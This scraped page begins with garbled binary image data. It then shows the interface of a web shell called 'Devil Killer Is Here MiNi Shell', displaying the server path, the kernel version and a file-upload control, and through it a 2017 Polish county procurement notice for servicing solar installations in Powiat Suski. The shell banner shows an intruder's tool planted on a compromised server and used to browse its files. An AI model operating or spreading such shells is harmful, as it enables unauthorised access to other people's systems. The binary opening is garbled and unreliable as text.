JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17028_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17028</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Powiat Suski</nazwa><ulica>ul. Kościelna</ulica><nr_domu>5 b</nr_domu><nr_miesz></nr_miesz><miejscowosc>Sucha Beskidzka</miejscowosc><kod_poczt>34-200 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>małopolskie</wojewodztwo><tel>33 875 79 00</tel><fax>33 874 15 52</fax><email>zamowienia.publiczne@powiatsuski.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.powiatsuski.pl</adres_strony_url><podmiot2c></podmiot2c><regon>072181675</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia>www.powiatsuski.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja /><zamieszczona_bedzie_specyfikacja></zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>składanie ofert w formie pisemnej za pośrednictwem opertora pocztowego, osobiście lub a posrednictwem posłańca</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Starostwo Powiatowe w Suchej Beskidzkiej, ul. Kościelna 5b, 34-200 Sucha Beskidzka</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Serwis zastępczy 2349 instalacji solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego i dla budynku Szpitala Rejonowego w Suchej Beskidzkiej w roku 2017 wraz z dostawą niezbędnych części do serwisowania</nazwa_zamowienia><numer_referencyjny>WZ.272.1.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>1.	Przedmiotem zamówienia jest wykonanie serwisu zastępczego 2349 instalacji solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego i dla budynku Szpitala Rejonowego w Suchej Beskidzkiej w roku 2017 wraz z dostawą niezbędnych części do serwisowania solarnych wraz z dostawą niezbędnych części do serwisowania. Przedmiot zamówienia jest podzielony na następujące części:
Część nr 1 – wykonanie serwisu 2349 instalacji solarnych, zlokalizowanych na budynkach mieszkalnych na terenie Powiatu Suskiego wraz z dostawą niezbędnych części do serwisowania,
Część nr 2 – wykonanie serwisu instalacji solarnej zlokalizowanej na budynku Szpitala Powiatowego w Suchej Beskidzkiej wraz z dostawą niezbędnych części do serwisowania.
2.	Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawcy mogą składać oferty na dowolną liczbę części przedmiotu zamówienia. Zamawiający nie ogranicza liczby części na które zamówienie może zostać udzielone temu samemu wykonawcy.
3.	Szczegółowy Opis przedmiotu zamówienia jest zawarty w:
1)	dla części nr 1 – w załączniku 4a do SIWZ;
2)	dla części nr 2 – w załączniku 4b do SIWZ.
4.	Przedmiotowe zamówienie powinno być zrealizowane zgodnie z wzorem umowy, który jest ustalony:
1)	dla części nr 1 – w załączniku 5a do SIWZ;
2)	dla części nr 2 – w załączniku 5b do SIWZ.
5.	Wykonawca nie może uchylać się od wykonania czynności lub różnego rodzaju detali nieprzedstawionych wprost w Opisie przedmiotu zamówienia dla właściwej części przedmiotu zamówienia, jeśli konieczność ich wykonania wynika z zasad rzetelnej wiedzy technicznej  tj. są one niezbędne z punktu widzenia poprawności wykonania serwisu i celu jakiemu mają służyć. Wykonawca nie jest uprawniony do żądania dodatkowego wynagrodzenia za te czynności i/lub roboty.
pozostałe informacje w siwz
</przedmiot_zam><cpv1c>50720000-8</cpv1c><cpv2c>50510000-3</cpv2c><okres2c>31/12/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67 /><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>a)	zdolność techniczną lub zawodową wykonawcy
O udzielenie zamówienia może ubiegać się Wykonawca, który w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wykonał należycie co najmniej: 
Dla części nr 1 – zadanie lub zadania (co najmniej jedno zadanie) polegające na wykonaniu serwisu (w tym konserwacji lub naprawy) nie mniej niż 200 instalacji solarnych.
Dla części nr 2 – zadanie lub zadania (co najmniej jedno zadanie) polegające na wykonaniu serwisu (w tym konserwacji lub naprawy) nie mniej niż 3 Instalacji solarnych o powierzchni absorpcji nie mniejszej niż 200 m2 każda. Zadanie lub zadania te realizowane przez okres co najmniej 6 miesięcy.

b)	wykształcenie, kwalifikacje zawodowe, doświadczenie, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia:
O udzielenie zamówienia może ubiegać się Wykonawca, który dysponuje lub będzie dysponował co najmniej następującymi osobami:
Dla części nr 1 – dwoma osobami, które będą uczestniczyć w wykonaniu zamówienia w charakterze serwisanta, a które posiadają (każda) doświadczenie w wykonaniu serwisu (w tym konserwacji lub naprawy) nie mniej niż 100 instalacji solarnych.
Dla części nr 2 – jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze serwisanta, a która posiada doświadczenie w wykonywaniu serwisu (w tym konserwacji lub naprawy) nie mniej niż 3 Instalacji solarnych o powierzchni absorpcji nie mniejszej niż 200 m2 każda, przez okres nie mniej niż 6 miesięcy.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, chyba, że Zamawiający posiada te dokumenty lub może je uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1)	wykaz usług odpowiadających opisowi warunku określonemu w pkt V.3.a  siwz wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie. Wzór wykazu stanowi załącznik nr 6 do SIWZ;
2)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego odpowiednio do warunku określonego w pkt V.3.b siwz a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi załącznik nr 7 do SIWZ;
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>Ponadto w terminie 3 dni od zamieszczenia przez zamawiającego informacji z otwarcia ofert na stronie internetowej, na której udostępniana jest SIWZ, wykonawcy składają bez wezwania oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia stanowi załącznik nr 8 do SIWZ. Oświadczenie należy złożyć w miejscu o którym mowa w pkt XI.1.

6.	Oferta składa się z:
1)	wypełnionego Formularza oferty, o treści zgodnej ze wzorem określonym w załączniku nr 1 do SIWZ,
2)	kosztorys ofertowy według wzoru stanowiącego odpowiednio Załącznik Nr 9a do SIWZ lub Załącznik nr 9b do SIWZ (w zależności od części przedmiotu zamówienia).
7.	Wraz z ofertą powinny być złożone:
1)	pełnomocnictwo lub inny dokument potwierdzający upoważnienie do podpisania oferty – w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z załączonego do oferty dokumentu (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza);
2)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza);
3)	dokumenty i oświadczenia, określone pkt VI.1 SIWZ tj:
1)	Oświadczenie o braku podstaw do wykluczenia z udziału w postępowaniu (Załącznik nr 2 do SIWZ).
2)	Oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 3 do SIWZ).
3)	Dokumenty potwierdzające udostępnienie wykonawcy zasobów przez inny podmiot na zasadach określonych w art. 22a ustawy Pzp – jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych podmiotów.
4)	Na potwierdzenie, czy Wykonawca będzie dysponował zasobami innych podmiotów w celu wykazania spełnienia warunków, o których mowa w pkt V, w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów Zamawiający wymaga złożenia dokumentów, z których będzie wynikać: 
	zakres dostępnych wykonawcy zasobów innego podmiotu;
	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
	oraz czy inne podmioty, na zdolności, których wykonawca powołuje się w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują usługi których wskazane zdolności dotyczą.
5)	Wykonawca, który powołuje się na zasoby innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt VI.1.1 – VI.1.2 SIWZ.
dowód wniesienia wadium

</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>1.	Wykonawca jest zobowiązany wnieść wadium w wysokości:
1)	dla części nr 1 – 5000,00 zł (słownie: pięć tysięcy złotych)
2)	dla części nr 2 – wadium nie jest wymagane
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275).
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy zamawiającego:
nr 31 2030 0045 1110 0000 0155 1450 
Bank BGŻ BNP Paribas S.A.
z adnotacją „wadium – numer sprawy WZ.272.1.2017”.
Zaleca się dołączenie do oferty kserokopii dokumentu potwierdzającego dokonanie przelewu.
4.	Za skuteczne wniesienie wadium w pieniądzu, zamawiający uzna wadium, które znajdzie się na rachunku bankowym zamawiającego przed upływem terminu składania ofert. 
5.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie zamawiającego, sporządzoną zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:
1)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
2)	kwotę gwarancji,
3)	termin ważności gwarancji w formule: „od dnia …… – do dnia ………”,
4)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze żądanie zamawiającego w sytuacjach określonych w art. 46 ust. 4a oraz ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
6.	W przypadku wnoszenia wadium w formie innej niż pieniężna, zamawiający wymaga złożenia wraz z ofertą oryginału dokumentu wadialnego (gwarancji lub poręczenia).
7.	Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej /><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy z uwzględnianiem art.144 ustawy Prawo zamówień publicznych.
2.	Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
1)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy – zmianie może ulec okres realizacji umowy, a także zakres prac przewidzianych do wykonania zgodnie z SIWZ; 
2)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia – Zamawiający dopuszcza możliwość zmiany umowy, w szczególności okresu realizacji zamówienia,
3)	ograniczenie zakresu umowy w stosunku do zakresu wynikającego z SIWZ, wraz ze związaną z tym zmianą maksymalnej kwoty wynagrodzenia wynikającej z umowy – przez jednostronne oświadczenie Zamawiającego. W takim przypadku maksymalna kwota wynagrodzenia wynikająca z umowy przysługująca Wykonawcy zostanie odpowiednio pomniejszona, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wykonanymi już świadczeniami. Zamawiający w tym zakresie dopuszcza także możliwość proporcjonalnego ograniczenia okresu realizacji umowy,
4)	wprowadzenie i zmiana podwykonawcy, a także zmiana zakresu zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - na pisemny wniosek Wykonawcy. W razie wprowadzenia nowego podwykonawcy Wykonawca będzie zobowiązany do spełnienia wymagań określonych w § 5 ust. 4 umowy,
5)	Wykonawca może dokonywać zmiany Serwisantów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nową osobę. W takim przypadku Wykonawca będzie zobowiązany wykazać, że proponowana osoba posiada kwalifikacje i doświadczenie nie mniejsze, niż wymagane w SIWZ,
6)	Wykonawca z własnej inicjatywy proponuje zmianę Serwisantów w następujących przypadkach:
a)	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy,
7)	jeżeli zmiana Serwisanta stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.), Zamawiający może zażądać od Wykonawcy zmiany Serwisanta jeżeli uzna, że osoba nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić Serwisanta zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. Wskazując nowego kandydata Wykonawca będzie zobowiązany wykazać, że posiada on kwalifikacje i doświadczenie nie mniejsze, niż wymagane w SIWZ,
8)	zmiany stawek wynagrodzenia Wykonawcy w stosunku do wynikających z oferty, w przypadku zmiany:
a)	stawki podatku od towarów i usług,
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,
- jeżeli Wykonawca wykaże, że zmiany te będą miały wpływ na koszty wykonania zamówienia. Zmiany te mogą nastąpić proporcjonalnie do wpływu czynników, o których mowa w podpunktach 1-3 na stawki wynagrodzenia Wykonawcy wynikające z oferty.
3.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego za wykonanie części przedmiotu umowy.
4.	Zamawiający zastrzega możliwość rozwiązania umowy z zachowaniem 7-dniowego terminu wypowiedzenia bez odszkodowania i bez podania przyczyny. W takim przypadku Wykonawca serwisu otrzyma wynagrodzenie ustalone na podstawie rzeczywistego zaangażowania realizacji niniejszej umowy.
5.	Przed upływem okresu wypowiedzenia, wygaśnięcia umowy Wykonawca serwisu obowiązany jest do złożenia Zamawiającemu pisemnego sprawozdania obejmującego czynności podjęte w ramach umowy. W tym samym terminie Wykonawca obowiązany jest przekazać Zamawiającemu lub osobie przez nią wskazana wszystkie dokumenty związane z realizacją inwestycji. Warunkiem rozliczenia wynagrodzenia z Wykonawcą w przypadku wypowiedzenia jest spełnienie przez niego obowiązków określonych w niniejszej umowie.
